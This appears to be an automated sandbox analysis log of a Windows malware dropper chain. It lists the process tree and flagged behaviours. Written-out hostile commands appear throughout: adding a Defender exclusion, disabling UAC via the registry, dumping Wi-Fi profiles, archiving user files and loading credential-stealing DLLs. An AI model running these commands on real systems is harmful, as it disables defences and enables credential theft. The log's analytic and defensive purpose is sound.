chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 1904 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 4908 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 4908 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe PID 3572 wrote to memory of 3840 3572 chrome.exe chrome.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
Uni400uni.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Uni400uni.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe"C:\Users\Admin\AppData\Local\Temp\25fee0705c845d42b1b9fd2b3273808e358587d17cc9706dea565a2e68c10a52.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\1000054001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000054001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:68
-
-
C:\Users\Admin\AppData\Local\Temp\1000055001\7285787827.exe"C:\Users\Admin\AppData\Local\Temp\1000055001\7285787827.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc2ac19758,0x7ffc2ac19768,0x7ffc2ac197785⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:25⤵PID:1904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:85⤵PID:4908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:85⤵PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2896 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:15⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2904 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:15⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4468 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:15⤵PID:3152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:85⤵PID:2816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:85⤵PID:3104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1828,i,10494764227899848175,1870372258296707249,131072 /prefetch:85⤵PID:1740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000056001\58c9b1fd40.exe"C:\Users\Admin\AppData\Local\Temp\1000056001\58c9b1fd40.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"3⤵PID:4624
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main3⤵
- Loads dropped DLL
PID:3080 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4388 -
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\687926120302_Desktop.zip' -CompressionLevel Optimal5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1628
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:3844
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3064
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 8003⤵
- Program crash
PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3160 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1608
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1708
-
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5312
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:5328
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:4152
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:592
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:4728
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5356 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
PID:5872 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
PID:6004
-
-
C:\Users\Admin\AppData\Local\Temp\1000198001\Uni400uni.exe"C:\Users\Admin\AppData\Local\Temp\1000198001\Uni400uni.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:5376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000198001\Uni400uni.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5660 -
C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe"C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe"5⤵
- Executes dropped EXE
PID:6072 -
C:\Users\Admin\AppData\Local\Temp\u4oo.0.exe"C:\Users\Admin\AppData\Local\Temp\u4oo.0.exe"6⤵
- Executes dropped EXE
PID:4668
-
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"6⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe7⤵PID:4232
-
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe8⤵PID:6848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵PID:6492
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe10⤵PID:6576
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u4oo.1.exe"C:\Users\Admin\AppData\Local\Temp\u4oo.1.exe"6⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD17⤵PID:6592
-
-
-
-
C:\Users\Admin\Pictures\f6HIBpWZz6vXG4h2PgTe8JUo.exe"C:\Users\Admin\Pictures\f6HIBpWZz6vXG4h2PgTe8JUo.exe"5⤵
- Executes dropped EXE
PID:5608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4416
-
-
C:\Users\Admin\Pictures\f6HIBpWZz6vXG4h2PgTe8JUo.exe"C:\Users\Admin\Pictures\f6HIBpWZz6vXG4h2PgTe8JUo.exe"6⤵PID:4244
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5736
-
-
-
-
C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"5⤵
- Executes dropped EXE
PID:5620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:6096
-
-
C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"6⤵PID:1136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5804
-
-
-
-
C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe"C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe" --silent --allusers=05⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:6068 -
C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exeC:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x2a0,0x2b0,0x6b31e1d0,0x6b31e1dc,0x6b31e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4348
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\e7eypyspmqtJqAFHcA4bI3CL.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\e7eypyspmqtJqAFHcA4bI3CL.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6120
-
-
C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe"C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6068 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240418222821" --session-guid=48639d33-b653-4543-9338-fe676e39436e --server-tracking-blob="NTYyMjFiMjdkZGE4M2Q1Y2E5MDRmZjcwNjM5MzkwNjc1OWY1YTQ0MmI1Mzk4YjY2MjExMjVlMDAwMDhjMzZiMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNDc5MjkyLjk3MTciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMDAwNjFkMTgtZWEyYy00MTlhLWEzMjEtMmIyYzBiNDUyOWQ5In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6C040000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5968 -
C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exeC:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a0,0x2b0,0x2b4,0x27c,0x2b8,0x6a99e1d0,0x6a99e1dc,0x6a99e1e87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:592
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\installer.exe" --backend --initial-pid=6068 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211" --session-guid=48639d33-b653-4543-9338-fe676e39436e --server-tracking-blob="NTYyMjFiMjdkZGE4M2Q1Y2E5MDRmZjcwNjM5MzkwNjc1OWY1YTQ0MmI1Mzk4YjY2MjExMjVlMDAwMDhjMzZiMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNDc5MjkyLjk3MTciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMDAwNjFkMTgtZWEyYy00MTlhLWEzMjEtMmIyYzBiNDUyOWQ5In0= " --silent --desktopshortcut=1 --install-subfolder=109.0.5097.457⤵PID:1588
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ffc0fcc7c80,0x7ffc0fcc7c8c,0x7ffc0fcc7c988⤵PID:6548
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\installer_helper_64.exe"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\installer_helper_64.exe" 1 "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\Opera Browser.lnk"8⤵PID:404
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=08⤵PID:3664
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x244,0x248,0x24c,0x220,0xac,0xfa6038,0xfa6044,0xfa60509⤵PID:6776
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"8⤵PID:6224
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x28c,0x290,0x294,0x288,0x20c,0x7ffc01160650,0x7ffc01160660,0x7ffc011606709⤵PID:4324
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,14565450753250355976,94531689998791412,262144 --variations-seed-version --mojo-platform-channel-handle=1840 /prefetch:29⤵PID:6912
-
-
